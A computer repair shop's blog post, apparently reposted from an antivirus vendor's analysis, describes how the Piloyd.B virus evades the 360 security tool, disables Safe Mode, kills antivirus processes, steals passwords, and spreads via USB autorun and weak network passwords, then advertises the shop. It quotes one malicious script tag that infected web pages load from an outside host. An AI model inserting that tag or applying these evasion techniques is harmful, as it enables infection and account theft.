钱江电脑

近来，钱江电脑服务中心接到部分客户反映，系统出现一系列问题，账号密码出现异常，经反馈分析后发现，许多用户都只安装了360安全卫士，而此病毒刚好可以绕过它的监控，在此，钱江电脑服务中心再次提醒广大用户，一定要用正版杀毒软件进行保护，以防账号密码被盗。

   据反病毒专家分析，无极杀手病毒PILOYD.B正在迅速蔓延，目前已经几十万用户中招，此病毒运行后，生成qmgr.dll病毒文件，加载sfc_os.dll并查找其5号导出函数，使得系统的文件保护对于其要修改的qmgr.dll失效，然后病毒从资源中读取数据写到qmgr.dll，修改该文件时间，并启动对应的服务。然后在系统目录下把自身复制为lsasvc.dll并在临时目录释放“TempDel.bat”以删除自身。

   病毒检查当前模块所在进程是否为360tray.exe，如果是则创建一个名为”360SpShadow0″的设备，通过发送IO控制码的方式控制绕过360tray.exe的检测，完成后，退出程序。

   查找当前系统中是否存在进程”360tray.exe”，如果有，则
将%SystemRoot%\system32\qmgr.dll复制为%SystemRoot%\system32\1l1.dll,将%SystemRoot%\system32\1l1.dll注入到目标进程空间，从而第一步的内容得到执行，完成后，删除%SystemRoot%\system32\1l1.dll，同时清空hosts文件。

   完成以上动作后，病毒会创建多个线程执行不同操作：

   将qmgr.dll对应的BITS服务启动类型设置为自动。
   删除如下HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network破坏安全模式

   然后在临时文件夹内创建一个名为LiTdi.sys的驱动，创建名为LiTdi服务，并启动服务。查找相关杀毒软件或安全软件进程，并向驱动发送IO控制码的方式结束相关进程。

   病毒还会调用IE访问http://nb**.114anhui.com/msn/163.htm做感染统计。从表项中依次选择下载十几种恶意程序，其中多数为盗号木马。

   病毒还会感染可移动存储设备上的exe,rar,htm,html,asp,aspx文件，对于扩展名为.rar的文件，病毒还会解包感染以上扩展名文件后再压缩回去。对于htm,html,asp,aspx的网页文件，病毒会在其尾部加上“<script language=javascript
src=http://mm.aa88567.cn/index/mm.js></script>”的恶意代码，使得这些网页文件成为病毒的二次传播源，用户一旦点击这些被感染文件，则会被病毒感染。

   病毒还会通过自动播放功能传播。查找可移动存储设备并在其根目录下生成autorun.inf，建立一个名为recycle.{645FF040-5081-101B-9F08-00AA002F954E}的文件夹，把%SystemRoot%\system32\dllcache\lsasvc.dll复制到该目录下为Ghost.exe。

   通过自带的弱密钥列表对网上邻居进行猜解，被猜解成功的管理员账户密码的计算机将受到感染；如果连接成功，则将C:\WINDOWS\system32\dllcache\lsasvc.dll拷贝到对方机器的C:\cm.exe，同时创建计划任务以激活该病毒。摘自江民科技

钱江电脑：皋埠电脑维修中心，绍兴生态产业园电脑医院，位于皋埠人民医院门口（公交1路车站旁，28路、360路、361、362路至朱家泾站向西200米）

主营电脑维修、网络维护、软件开发、网站制作等IT技术服务；是联想、戴尔、惠普、三星等品牌机、笔记本代理商，价格实惠，同时提供各种电脑配件。钱江电脑一线技术人员拥有上市公司、国企民营等众多行业维护经验，包年服务收费低，服务好，我们也提供相关的IT技术外包支持服务，欢迎咨询洽谈！

钱江电脑服务中心网址：www.8880575.com  钱江博客：www.8880575.com/2010/ 欢迎您的访问！

本文地址：钱江电脑：“无极杀手”病毒（Piloyd.b）技术分析